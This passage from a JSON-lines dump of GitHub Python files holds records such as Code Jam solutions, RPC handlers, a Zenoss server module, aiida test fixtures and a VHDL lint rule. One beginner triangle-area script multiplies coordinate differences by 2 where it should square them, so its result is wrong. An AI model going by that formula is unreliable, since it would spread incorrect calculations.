]\n","repo_name":"morpframework/morpcc_ttw","sub_path":"morpcc_ttw/application/modelui.py","file_name":"modelui.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70522204035","text":"def remove_x(inputString):\n if len(inputString)==0:\n return \"\"\n smallStringOutput = remove_x(inputString[1:])\n if inputString[0]==\"x\":\n return \"\"+smallStringOutput\n else:\n return inputString[0]+smallStringOutput\n\nstringForInput = str(input())\nprint(remove_x(stringForInput))\n ","repo_name":"asingh88029/dsa_python","sub_path":"recursion/remove_x_from_string.py","file_name":"remove_x_from_string.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23517985701","text":"import sys\n\ndef answer_problem(file_name, f_solve):\n with open(file_name, 'r') as f:\n n = int(f.readline())\n output_str = '\\n'.join(\n \"Case #{0}: {1}\".format(i+1, f_solve(input_str))\n for i, input_str in enumerate(f.read().splitlines()))\n return output_str\n\n\n\ndef solve_a(input_str):\n letters_seen = set()\n all_letters = set(str(x) for x in range(10))\n incr = int(input_str)\n if incr == 0:\n return \"INSOMNIA\"\n x = 0\n while letters_seen != all_letters:\n x += incr\n letters_seen |= set(str(x))\n return str(x)\n\ndef solve_b(input_str):\n num_flips = 0\n while input_str != '+' * len(input_str):\n if input_str.find('+') == -1:\n return num_flips + 1\n elif input_str.find('+') < input_str.find('-'):\n input_str = flip_n_pancakes(input_str, \n input_str.find('-'))\n else:\n input_str = flip_n_pancakes(input_str, \n input_str.find('+'))\n num_flips += 1\n return num_flips\n\ndef flip_n_pancakes(pancake_pile, n):\n return ''.join({'+':'-', '-': '+'}[x] for x in \n pancake_pile[:n][::-1]) + pancake_pile[n:]\n\n\ndef answer_problem_special(file_name, f_solve):\n with open(file_name, 'r') as f:\n num_cases = int(f.readline())\n n, j = f.readline().split()\n return f_solve(n, j)\n\ndef solve_c(string_len, num_cases):\n output_str = \"Case #1:\\n\"\n num_string = '1' * int(string_len)\n num_cases = int(num_cases)\n while num_cases:\n non_triv_divs = get_nontrivial_divisors(num_string)\n while not all(non_triv_divs):\n print(\"going down...\", num_string)\n num_string = next_lowest_candidate(num_string)\n non_triv_divs = get_nontrivial_divisors(num_string)\n output_str += ' '.join([num_string] + \n non_triv_divs) + '\\n'\n print(\"got one!\", num_string)\n num_string = next_lowest_candidate(num_string)\n num_cases -= 1\n return output_str\n\ndef get_nontrivial_divisors(num_string):\n return [find_str_divisor(str_base_n_to_int(num_string, i))\n for i in range(2, 11)]\n\ndef next_lowest_candidate(num_string):\n return '1' + int_to_str_binary(\n str_base_n_to_int(num_string[1:-1], 2) - 1) + '1'\n\ndef str_base_n_to_int(input_str, base):\n return sum(int(input_str[x]) * (base ** \n (len(input_str) - 1 - x))\n for x in range(len(input_str)))\n\ndef int_to_str_binary(input_num):\n output_str = \"\"\n while input_num:\n input_num, i = divmod(input_num, 2)\n output_str = str(i) + output_str\n return output_str\n\ndef find_str_divisor(n):\n import math\n for i in xrange(2, 10000): #int(math.sqrt(n))):\n if n % i == 0:\n return str(i)\n return None\n\ndef solve_d(input_str):\n k, c, s = (int(x) for x in input_str.split())\n if c == 1:\n if s < k:\n return \"IMPOSSIBLE\"\n else:\n return ' '.join(str(x+1) for x in range(k))\n elif c > 1 and s < k / float(2):\n return \"IMPOSSIBLE\"\n else:\n output_list = [(2 * k * x) + (2 * (x + 1)) for x in range((k + 1) // 2)]\n if k % 2:\n output_list[-1] -= 1\n # Checking stuff\n #for x in get_all_single_gold(k, c):\n # solved = False\n # for y in output_list:\n # if y > len(x):\n # print(\"OVERSIZE!\", x, len(x), y, input_str)\n # if x[y-1] == 'G':\n # solved = True\n # if not solved:\n # print(\"NOT SOLVED!\", input_str, x, output_list)\n # Return\n return ' '.join(str(x) for x in output_list)\n\n\ndef get_all_single_gold(k, c):\n for i in range(k):\n pattern = ('L' * i) + 'G' + ('L' * (k - 1 - i))\n complex_pattern = pattern\n for j in range(c-1):\n complex_pattern = apply_complexity_plus_one(complex_pattern, pattern)\n yield complex_pattern\n\ndef apply_complexity_plus_one(last_complexity, orig_pattern):\n return ''.join({'G': len(orig_pattern) * 'G', 'L': orig_pattern}[x] for x in last_complexity)\n\n\n\nif __name__ == \"__main__\":\n #output_str = answer_problem(sys.argv[1], solve_a)\n #output_str = answer_problem(sys.argv[1], solve_b)\n #output_str = answer_problem_special(sys.argv[1], solve_c)\n output_str = answer_problem(sys.argv[1], solve_d)\n with open(sys.argv[1].replace('.in', '.out'), 'w') as f:\n f.write(output_str)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_180/920.py","file_name":"920.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26800950350","text":"from twisted.web import xmlrpc\nfrom twisted.internet import defer\nimport xmlrpclib\n\nfrom siptrackdlib import container\nfrom siptrackdlib import errors\n\nfrom siptrackd_twisted import helpers\nfrom siptrackd_twisted import gatherer\nfrom siptrackd_twisted import baserpc\n\nclass ContainerTreeRPC(baserpc.BaseRPC):\n node_type = 'container tree'\n\n @helpers.ValidateSession()\n @defer.inlineCallbacks\n def xmlrpc_add(self, session, parent_oid):\n \"\"\"Create a new container tree.\"\"\"\n parent = self.object_store.getOID(parent_oid, user = session.user)\n obj = parent.add(session.user, 'container tree')\n yield self.object_store.commit(obj)\n defer.returnValue(obj.oid)\n\nclass ContainerRPC(baserpc.BaseRPC):\n node_type = 'container'\n\n @helpers.ValidateSession()\n @defer.inlineCallbacks\n def xmlrpc_add(self, session, parent_oid):\n \"\"\"Create a new container.\"\"\"\n parent = self.object_store.getOID(parent_oid, user = session.user)\n obj = parent.add(session.user, 'container')\n yield self.object_store.commit(obj)\n defer.returnValue(obj.oid)\n\ngatherer.node_data_registry.register(container.ContainerTree,\n gatherer.no_data_extractor)\ngatherer.node_data_registry.register(container.Container,\n gatherer.no_data_extractor)\n","repo_name":"sii/siptrackd","sub_path":"siptrackd_twisted/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23638271741","text":"import sys\r\nfi = open(sys.argv[1])\r\nfo = open(sys.argv[2], 'w')\r\nfr = fi.readline\r\n\r\nT = int(fr())\r\nfor t in xrange(T):\r\n tmp = map(int, fr().split())\r\n N, S, p = tmp[:3]\r\n tt = tmp[3:]\r\n tt.sort(reverse=True)\r\n res = 0\r\n for i in tt:\r\n if (i+2)/3 >= p:\r\n res += 1\r\n elif i <= 2:\r\n if i >= p and S != 0:\r\n S -= 1\r\n res += 1\r\n elif (i+4)/3 >= p:\r\n if S != 0:\r\n S -= 1\r\n res += 1\r\n else:\r\n break\r\n fo.write(\"Case #%d: %d\\n\" % (t+1, res))\r\nfo.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_96/1393.py","file_name":"1393.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30931028521","text":"\"\"\"table of mean ccc for xgb/rf classifiers across 500 test datasets\"\"\"\r\nimport pandas as pd\r\nimport os\r\n\r\ndate = \"2020_05_07\"\r\nint_cause = \"x59\"\r\nmodel_dir = f\"/ihme/cod/prep/mcod/process_data/{int_cause}/thesis/{date}\"\r\n\r\nall_df = []\r\nfor short_name in [\"xgb\", \"rf\"]:\r\n dfs = []\r\n for root, dirs, files in os.walk(os.path.join(\r\n os.path.join(model_dir, short_name))):\r\n for stats_dir in dirs:\r\n if os.path.exists(os.path.join(\r\n model_dir, short_name, stats_dir, \"summary_stats.csv\")):\r\n df = pd.read_csv(os.path.join(\r\n model_dir, short_name, stats_dir, \"summary_stats.csv\"))\r\n df[\"model_params\"] = stats_dir\r\n else:\r\n df = pd.DataFrame()\r\n df[\"model_params\"] = stats_dir\r\n dfs.append(df)\r\n df = pd.concat(dfs, sort=True, ignore_index=True)\r\n df = df.sort_values(by=\"mean_test_concordance\",\r\n ascending=False)[[\"model_params\" ,\"mean_test_concordance\"]]\r\n df[\"short_name\"] = short_name\r\n all_df.append(df)\r\nalls = pd.concat(all_df, sort=True, ignore_index=True)\r\n\r\nalls.to_csv(f\"/home/j/temp/agesak/thesis/model_results/{date}/{date}_{int_cause}_xgb_rf_summary.csv\", index=False)","repo_name":"agesak/thesis","sub_path":"misc/training_summaries.py","file_name":"training_summaries.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17613438393","text":"from __future__ import absolute_import\n\nfrom twisted.cred import portal\nfrom twisted.internet.endpoints import serverFromString\nfrom zope.component import getUtility\n\nfrom Products.ZenUtils.PBUtil import setKeepAlive\n\nfrom .auth import HubRealm\nfrom .avatar import HubAvatar\nfrom .broker import ZenPBServerFactory\nfrom .interface import IHubServerConfig\nfrom .router import ServiceCallRouter\nfrom .service import (\n ServiceLoader,\n ServiceManager,\n ServiceReferenceFactory,\n ServiceRegistry,\n WorkerInterceptor,\n)\nfrom .utils import import_name, TCPDescriptor\nfrom .workerpool import WorkerPool\n\n\n# Global reference to _executor instances\n_executors = {}\n\n\ndef start_server(reactor, server_factory):\n \"\"\"Start the PerspectiveBroker server.\n\n :param reactor: The Twisted reactor.\n :param server_factory: Used by Twisted to create PB server.\n :type server_factory: .broker.ZenPBServerFactory\n \"\"\"\n # Start the executors:\n global _executors\n for executor in _executors.values():\n executor.start(reactor)\n\n # Retrieve the server config object.\n config = getUtility(IHubServerConfig)\n\n # Build the network descriptor for the PerspectiveBroker server.\n pb_descriptor = TCPDescriptor.with_port(config.pbport)\n\n # Construct the PerspectiveBroker server\n pb_server = serverFromString(reactor, pb_descriptor)\n\n # Begin listening\n dfr = pb_server.listen(server_factory)\n\n # set the keep-alive config on the server's listening socket\n dfr.addCallback(lambda listener: setKeepAlive(listener.socket))\n\n\ndef stop_server():\n # Stop the executors:\n global _executors\n for executor in _executors.values():\n executor.stop()\n\n\ndef make_server_factory(pools, manager, authenticators):\n \"\"\"Return a ZenPBServerFactory instance.\n\n :param service_registry: Registry of loaded ZenHub services\n :type service_registry: Mapping[str, HubServer]\n :param authenticators: Used to authenticate clients.\n :type authenticators: Sequence[Authenticator]\n \"\"\"\n # Build the authentication pieces\n avatar = HubAvatar(manager, pools)\n realm = HubRealm(avatar)\n hubportal = portal.Portal(realm, authenticators)\n\n # Return the initialized Perspective Broker server factory.\n return ZenPBServerFactory(hubportal)\n\n\ndef make_service_manager(pools):\n # Retrieve the server config object.\n config = getUtility(IHubServerConfig)\n\n registry = ServiceRegistry()\n routes = ServiceCallRouter.from_config(config.routes)\n\n # Build the executors;\n # returns a dict having : \n executors = make_executors(config, pools)\n\n # Build the ZenHub service manager\n loader = ServiceLoader()\n factory = ServiceReferenceFactory(WorkerInterceptor, routes, executors)\n return ServiceManager(registry, loader, factory)\n\n\ndef make_pools():\n # Retrieve the server config object.\n config = getUtility(IHubServerConfig)\n # Registry of references to zenhubworker connections\n # : WorkerPool\n return {name: WorkerPool(name) for name in config.pools.keys()}\n\n\ndef make_executors(config, pools):\n global _executors\n for name, spec in config.executors.items():\n modpath, clsname = spec.split(\":\", 1)\n cls = import_name(modpath, clsname)\n executor = cls.create(name, config=config, pool=pools.get(name))\n _executors[name] = executor\n return _executors\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenHub/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"22605198762","text":"import collections\nimport os\nimport shutil\nimport tempfile\nimport types\n\nimport pytest\n\npytest_plugins = [\"aiida.manage.tests.pytest_fixtures\"]\n\n\n@pytest.fixture(scope=\"function\")\ndef fixture_sandbox():\n \"\"\"Return a `SandboxFolder`.\"\"\"\n from aiida.common.folders import SandboxFolder\n\n with SandboxFolder() as folder:\n yield folder\n\n\n@pytest.fixture\ndef fixture_localhost(aiida_localhost):\n \"\"\"Return a localhost `Computer`.\"\"\"\n localhost = aiida_localhost\n localhost.set_default_mpiprocs_per_machine(1)\n return localhost\n\n\n@pytest.fixture\ndef fixture_code(fixture_localhost):\n \"\"\"Return a `Code` instance configured to run calculations of given entry point on localhost `Computer`.\"\"\"\n\n def _fixture_code(entry_point_name):\n from aiida.orm import Code\n\n return Code(\n input_plugin_name=entry_point_name,\n remote_computer_exec=[fixture_localhost, \"/bin/true\"],\n )\n\n return _fixture_code\n\n\n@pytest.fixture\ndef fixture_remotedata(fixture_localhost, shared_datadir):\n \"\"\"Return a `RemoteData` with contents from the specified directory.\n\n Optionally a mapping of strings to replace in the filenames can be passed. Note that the order\n of replacement is not guaranteed.\n\n The RemoteData node is yielded and points to a folder in /tmp, and is removed at the end.\n \"\"\"\n from aiida.orm import RemoteData\n\n replacement_mapping = {\"gaas\": \"aiida\"}\n dir_path = shared_datadir / \"gaas\"\n\n with tempfile.TemporaryDirectory() as tmpdir:\n remote = RemoteData(remote_path=tmpdir, computer=fixture_localhost)\n for file_path in dir_path.iterdir():\n abs_path = str(file_path.resolve())\n res_file_path = os.path.join(tmpdir, file_path.name)\n for old, new in replacement_mapping.items():\n res_file_path = res_file_path.replace(old, new)\n shutil.copyfile(src=abs_path, dst=res_file_path)\n yield remote\n\n\n@pytest.fixture\ndef fixture_folderdata():\n \"\"\"Return a `FolderData` with contents from the specified directory.\n\n Optionally a mapping of strings to replace in the filenames can be passed. Note that the order\n of replacement is not guaranteed.\n \"\"\"\n\n def _fixture_folderdata(dir_path, replacement_mapping=types.MappingProxyType({})):\n from aiida.orm import FolderData\n\n folder = FolderData()\n for file_path in os.listdir(dir_path):\n abs_path = os.path.abspath(os.path.join(dir_path, file_path))\n res_file_path = file_path\n for old, new in replacement_mapping.items():\n res_file_path = res_file_path.replace(old, new)\n folder.base.repository.put_object_from_file(abs_path, res_file_path)\n return folder\n\n return _fixture_folderdata\n\n\n@pytest.fixture\ndef generate_calc_job():\n \"\"\"Fixture to construct a new `CalcJob` instance and call `prepare_for_submission` for testing `CalcJob` classes.\n\n The fixture will return the `CalcInfo` returned by `prepare_for_submission` and the temporary folder that was passed\n to it, into which the raw input files will have been written.\n \"\"\"\n\n def _generate_calc_job(folder, entry_point_name, inputs=None):\n \"\"\"Fixture to generate a mock `CalcInfo` for testing calculation jobs.\"\"\"\n from aiida.engine.utils import instantiate_process\n from aiida.manage.manager import get_manager\n from aiida.plugins import CalculationFactory\n\n manager = get_manager()\n runner = manager.get_runner()\n\n process_class = CalculationFactory(entry_point_name)\n process = instantiate_process(runner, process_class, **inputs)\n\n calc_info = process.prepare_for_submission(folder)\n\n return calc_info\n\n return _generate_calc_job\n\n\n@pytest.fixture\ndef generate_calc_job_node(shared_datadir):\n \"\"\"Fixture to generate a mock `CalcJobNode` for testing parsers.\"\"\"\n\n def flatten_inputs(inputs, prefix=\"\"):\n \"\"\"Flatten inputs recursively like :meth:`aiida.engine.processes.process::Process._flatten_inputs`.\"\"\"\n flat_inputs = []\n for key, value in inputs.items():\n if isinstance(value, collections.abc.Mapping):\n flat_inputs.extend(flatten_inputs(value, prefix=prefix + key + \"__\"))\n else:\n flat_inputs.append((prefix + key, value))\n return flat_inputs\n\n def _generate_calc_job_node( # pylint: disable=too-many-arguments\n entry_point_name,\n computer,\n seedname=None,\n test_name=None,\n inputs=None,\n attributes=None,\n ):\n \"\"\"Fixture to generate a mock `CalcJobNode` for testing parsers.\n\n :param entry_point_name: entry point name of the calculation class\n :param computer: a `Computer` instance\n :param test_name: relative path of directory with test output files in the `fixtures/{entry_point_name}` folder.\n :param inputs: any optional nodes to add as input links to the corrent CalcJobNode\n :param attributes: any optional attributes to set on the node\n :return: `CalcJobNode` instance with an attached `FolderData` as the `retrieved` node\n \"\"\"\n from aiida import orm\n from aiida.common import LinkType\n from aiida.plugins.entry_point import format_entry_point_string\n\n entry_point = format_entry_point_string(\"aiida.calculations\", entry_point_name)\n\n # If no seedname is specified, use the default 'aiida'\n evaluated_seedname = seedname or \"aiida\"\n node = orm.CalcJobNode(computer=computer, process_type=entry_point)\n node.base.attributes.set(\"input_filename\", f\"{evaluated_seedname}.win\")\n node.base.attributes.set(\"output_filename\", f\"{evaluated_seedname}.wout\")\n node.base.attributes.set(\"error_filename\", f\"{evaluated_seedname}.werr\")\n node.set_option(\"resources\", {\"num_machines\": 1, \"num_mpiprocs_per_machine\": 1})\n node.set_option(\"max_wallclock_seconds\", 1800)\n node.set_option(\"seedname\", evaluated_seedname)\n\n if attributes:\n node.set_attribute_many(attributes)\n\n if inputs:\n for link_label, input_node in flatten_inputs(inputs):\n input_node.store()\n node.base.links.add_incoming(\n input_node, link_type=LinkType.INPUT_CALC, link_label=link_label\n )\n\n node.store()\n\n if test_name is not None:\n filepath = str(shared_datadir / test_name)\n\n retrieved = orm.FolderData()\n retrieved.base.repository.put_object_from_tree(filepath)\n retrieved.base.links.add_incoming(\n node, link_type=LinkType.CREATE, link_label=\"retrieved\"\n )\n retrieved.store()\n\n remote_folder = orm.RemoteData(computer=computer, remote_path=\"/tmp\")\n remote_folder.base.links.add_incoming(\n node, link_type=LinkType.CREATE, link_label=\"remote_folder\"\n )\n remote_folder.store()\n\n return node\n\n return _generate_calc_job_node\n\n\n@pytest.fixture(scope=\"session\")\ndef generate_parser():\n \"\"\"Fixture to load a parser class for testing parsers.\"\"\"\n\n def _generate_parser(entry_point_name):\n \"\"\"Fixture to load a parser class for testing parsers.\n\n :param entry_point_name: entry point name of the parser class\n :return: the `Parser` sub class\n \"\"\"\n from aiida.plugins import ParserFactory\n\n return ParserFactory(entry_point_name)\n\n return _generate_parser\n\n\n@pytest.fixture(scope=\"session\")\ndef generate_structure_gaas():\n \"\"\"Return a `StructureData` representing bulk GaAs.\"\"\"\n\n def _generate_structure():\n \"\"\"Return a `StructureData` representing bulk GaAs.\"\"\"\n\n from aiida import orm\n\n param = 2.84\n structure = orm.StructureData(\n cell=[[-param, 0, param], [0, param, param], [-param, param, 0]]\n )\n\n structure.append_atom(symbols=\"Ga\", position=[0, 0, 0])\n structure.append_atom(\n symbols=\"As\", position=[-0.5 * param, 0.5 * param, 0.5 * param]\n )\n return structure\n\n return _generate_structure\n\n\n@pytest.fixture\ndef generate_win_params_gaas(generate_structure_gaas, generate_kpoints_mesh):\n \"\"\"Generate paramters for GaAs.\"\"\"\n\n def _generate_win_params_gaas(\n projections_dict=types.MappingProxyType(\n {\"kind_name\": \"As\", \"ang_mtm_name\": \"sp3\"}\n )\n ):\n from aiida import orm\n from aiida.tools import get_kpoints_path\n\n from aiida_wannier90.orbitals import generate_projections\n\n projections_dict_mutable = {**projections_dict}\n structure = generate_structure_gaas()\n inputs = {\n \"structure\": structure,\n \"kpoints\": generate_kpoints_mesh(2),\n \"kpoint_path\": get_kpoints_path(structure, method=\"legacy\")[\"parameters\"],\n \"parameters\": orm.Dict(\n dict={\"num_wann\": 4, \"num_iter\": 12, \"wvfn_formatted\": True}\n ),\n \"projections\": generate_projections(\n projections_dict_mutable, structure=structure\n ),\n }\n\n return inputs\n\n return _generate_win_params_gaas\n\n\n@pytest.fixture\ndef generate_kpoints_mesh():\n \"\"\"Return a `KpointsData` node.\"\"\"\n\n def _generate_kpoints_mesh(npoints):\n \"\"\"Return a `KpointsData` with a mesh of npoints in each direction.\"\"\"\n from aiida.orm import KpointsData\n\n kpoints = KpointsData()\n kpoints.set_kpoints_mesh([npoints] * 3)\n\n return kpoints\n\n return _generate_kpoints_mesh\n\n\n@pytest.fixture(scope=\"session\")\ndef generate_structure_o2sr():\n \"\"\"Return a `StructureData` representing bulk O2Sr.\"\"\"\n\n def _generate_structure():\n \"\"\"Return a `StructureData` representing bulk O2Sr.\"\"\"\n\n from aiida import orm\n\n structure = orm.StructureData(\n cell=[\n [-1.7828864010, 1.7828864010, 3.3905324933],\n [1.7828864010, -1.7828864010, 3.3905324933],\n [1.7828864010, 1.7828864010, -3.3905324933],\n ]\n )\n\n structure.append_atom(symbols=\"Sr\", position=[0, 0, 0])\n structure.append_atom(\n symbols=\"O\", position=[1.7828864010, 1.7828864010, 0.7518485043]\n )\n structure.append_atom(symbols=\"O\", position=[0, 0, 2.6386839890])\n return structure\n\n return _generate_structure\n\n\n@pytest.fixture\ndef generate_win_params_o2sr(generate_structure_o2sr, generate_kpoints_mesh):\n \"\"\"Generate paramters for O2Sr.\"\"\"\n\n def _generate_win_params_o2sr():\n from aiida import orm\n\n structure = generate_structure_o2sr()\n inputs = {\n \"structure\": structure,\n \"kpoints\": generate_kpoints_mesh(9),\n \"kpoint_path\":\n # To avoid dependency on seekpath, I paste here the result of\n # get_kpoints_path(structure)['parameters']\n orm.Dict(\n dict={\n \"point_coords\": {\n \"GAMMA\": [0.0, 0.0, 0.0],\n \"M\": [0.5, 0.5, -0.5],\n \"X\": [0.0, 0.0, 0.5],\n \"P\": [0.25, 0.25, 0.25],\n \"N\": [0.0, 0.5, 0.0],\n \"S_0\": [\n -0.3191276083914903,\n 0.3191276083914903,\n 0.3191276083914903,\n ],\n \"S\": [\n 0.3191276083914903,\n 0.6808723916085098,\n -0.3191276083914903,\n ],\n \"R\": [-0.1382552167829806, 0.1382552167829806, 0.5],\n \"G\": [0.5, 0.5, -0.1382552167829806],\n },\n \"path\": [\n (\"GAMMA\", \"X\"),\n (\"X\", \"P\"),\n (\"P\", \"N\"),\n (\"N\", \"GAMMA\"),\n (\"GAMMA\", \"M\"),\n (\"M\", \"S\"),\n (\"S_0\", \"GAMMA\"),\n (\"X\", \"R\"),\n (\"G\", \"M\"),\n ],\n }\n ),\n \"parameters\": orm.Dict(\n dict={\n \"num_wann\": 21,\n \"num_bands\": 31,\n \"num_iter\": 200,\n \"bands_plot\": True,\n \"auto_projections\": True,\n }\n ),\n }\n\n return inputs\n\n return _generate_win_params_o2sr\n\n\n@pytest.fixture(scope=\"session\")\ndef generate_structure_ca4mg8():\n \"\"\"Return a `StructureData` representing bulk Ca4Mg8.\"\"\"\n\n def _generate_structure():\n \"\"\"Return a `StructureData` representing bulk Ca4Mg8.\"\"\"\n\n from aiida import orm\n\n structure = orm.StructureData(\n cell=[\n [3.1235488629, -5.4101154125, 0.0000000000],\n [3.1235488629, 5.4101154125, 0.0000000000],\n [0.0000000000, 0.0000000000, 10.0402257142],\n ]\n )\n\n structure.append_atom(\n symbols=\"Ca\", position=[3.1235488629, 7.2135064307, 5.6428504986]\n )\n structure.append_atom(\n symbols=\"Ca\", position=[3.1235488629, 3.6067243943, 4.3973752156]\n )\n structure.append_atom(\n symbols=\"Ca\", position=[3.1235488629, 3.6067243943, 0.6227376415]\n )\n structure.append_atom(\n symbols=\"Ca\", position=[3.1235488629, 7.2135064307, 9.4174880727]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[3.1235488629, 0.0000000000, 5.0201128571]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[3.1235488629, 0.0000000000, 0.0000000000]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[1.5416212587, 9.9069482534, 7.5301692857]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[3.1235488629, 1.8266571732, 7.5301692857]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[4.7054764671, 9.9069482534, 7.5301692857]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[4.7054764671, 0.9132825716, 2.5100564285]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[3.1235488629, 8.9935736518, 2.5100564285]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[1.5416212587, 0.9132825716, 2.5100564285]\n )\n return structure\n\n return _generate_structure\n\n\n@pytest.fixture\ndef generate_win_params_ca4mg8(\n generate_structure_ca4mg8,\n):\n \"\"\"Generate parameters for Ca4Mg8.\"\"\"\n\n def _generate_win_params_ca4mg8():\n from aiida import orm\n\n structure = generate_structure_ca4mg8()\n kpoints = orm.KpointsData()\n kpoints.set_kpoints_mesh([6, 6, 4])\n inputs = {\n \"structure\": structure,\n \"kpoints\": kpoints,\n \"parameters\": orm.Dict(\n dict={\n \"num_wann\": 72,\n \"num_bands\": 86,\n \"num_iter\": 400,\n \"auto_projections\": True,\n }\n ),\n }\n\n return inputs\n\n return _generate_win_params_ca4mg8\n\n\n@pytest.fixture(scope=\"session\")\ndef generate_structure_br2fe():\n \"\"\"Return a `StructureData` representing bulk Br2Fe.\"\"\"\n\n def _generate_structure():\n \"\"\"Return a `StructureData` representing bulk Br2Fe.\"\"\"\n\n from aiida import orm\n\n structure = orm.StructureData(\n cell=[\n [3.1218481617, 1.8023993833, 0.0000000000],\n [-3.1218481617, 1.8023993833, 0.0000000000],\n [-0.0010222890, 0.0000000000, 6.6558096562],\n ]\n )\n\n structure.append_atom(\n symbols=\"Fe\", position=[0.0000000000, 0.0000000000, 0.0000000000]\n )\n structure.append_atom(\n symbols=\"Br\", position=[5.2020635002, 1.8023993833, 5.3570235967]\n )\n structure.append_atom(\n symbols=\"Br\", position=[4.1624586959, 0.0000000000, 1.2987860595]\n )\n return structure\n\n return _generate_structure\n\n\n@pytest.fixture\ndef generate_win_params_br2fe(\n generate_structure_br2fe,\n):\n \"\"\"Generate parameters for Br2Fe.\"\"\"\n\n def _generate_win_params_br2fe():\n from aiida import orm\n\n structure = generate_structure_br2fe()\n kpoints = orm.KpointsData()\n kpoints.set_kpoints_mesh([11, 11, 5])\n inputs = {\n \"structure\": structure,\n \"kpoints\": kpoints,\n \"parameters\": orm.Dict(\n dict={\n \"num_wann\": 17,\n \"num_bands\": 21,\n \"num_iter\": 400,\n \"auto_projections\": True,\n }\n ),\n }\n\n return inputs\n\n return _generate_win_params_br2fe\n","repo_name":"aiidateam/aiida-wannier90","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":17094,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"22946462863","text":"\nfrom vsg.rules import token_case_with_prefix_suffix\n\nfrom vsg import token\n\nlTokens = []\nlTokens.append(token.procedure_specification.designator)\n\n\nclass rule_501(token_case_with_prefix_suffix):\n '''\n This rule checks the procedure designator has proper case.\n\n |configuring_uppercase_and_lowercase_rules_link|\n\n **Violation**\n\n .. code-block:: vhdl\n\n procedure AVERAGE_SAMPLES is\n\n **Fix**\n\n .. code-block:: vhdl\n\n procedure average_samples is\n '''\n\n def __init__(self):\n token_case_with_prefix_suffix.__init__(self, 'procedure', '501', lTokens)\n self.groups.append('case::name')\n","repo_name":"jeremiah-c-leary/vhdl-style-guide","sub_path":"vsg/rules/procedure/rule_501.py","file_name":"rule_501.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"61"} +{"seq_id":"23569292071","text":"from functools import lru_cache\r\nfrom collections import Counter\r\n\r\nt = int(input())\r\n\r\n\r\ndef problem():\r\n inp = input().split()\r\n n = int(inp[0])\r\n k = int(inp[1])\r\n level = len(bin(k)[3:])\r\n values = get_values_on_level(n, level+1)\r\n keys = sorted(values.keys(), key=lambda v: v[1], reverse=True)\r\n remainder = k - ((2**level)-1)\r\n for key in keys:\r\n count = values[key]\r\n if count >= remainder:\r\n return key\r\n else:\r\n remainder -= count\r\n\r\n\r\n@lru_cache(maxsize=None)\r\ndef get_values_on_level(size2, level):\r\n l = size2 // 2\r\n if size2 % 2 == 0 and size2 != 0:\r\n r = (size2 // 2) - 1\r\n else:\r\n r = size2 // 2\r\n if level == 1:\r\n return {(l, r): 1}\r\n else:\r\n return Counter(get_values_on_level(l, level - 1)) + Counter(get_values_on_level(r, level - 1))\r\n\r\n\r\nfor i in range(1, t + 1):\r\n stats = problem()\r\n print(\"Case #{}: {} {}\".format(i, stats[0], stats[1]))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/209.py","file_name":"209.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75010965634","text":"x1,y1,x2,y2,x3,y3 = eval(input(\"enter the three points of the triangle:\"))\r\nside1 = ((x1 - x2) * 2 + (y1 - y2) * 2) ** 0.5\r\n\r\nside2 = ((x2 - x3) * 2 + (y2 - y3) * 2) ** 0.5\r\n\r\nside3 = ((x1 - x3) * 2 + (y1 - y3) * 2) ** 0.5\r\ns = float(side1+side2+side3)/2\r\narea = ( s * (s-side1) * (s-side2) * (s-side3))**0.5\r\n\r\nprint(\"The area of the triangle is\",area)","repo_name":"Arshdeep-kapoor/Python","sub_path":"chapter2-ques14.py","file_name":"chapter2-ques14.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8594955026","text":"# -*- coding: utf-8 -*-\n#\n# @author: Five\n# Created on 2013-5-14\n#\nfrom string import lower\n\nclass Gender(object):\n M = 'M'\n F = 'F'\n U = 'U'\n choices = (M, F, U)\n\n\nclass Boolean(object):\n YES = '1'\n NO = '0'\n choices = (YES, NO)\n \n \nclass Currency(object):\n \n USD = ('USD', 'USD')\n CAD = ('CAD', 'CAD')\n \n choices = (USD, CAD)\n \nclass FileType(object):\n \n ZIP = 'zip'\n TXT = 'txt'\n CSV = 'csv'\n \n @staticmethod\n def is_zip(ext):\n return lower(ext) == FileType.ZIP\n \n \n choices = (ZIP, TXT, 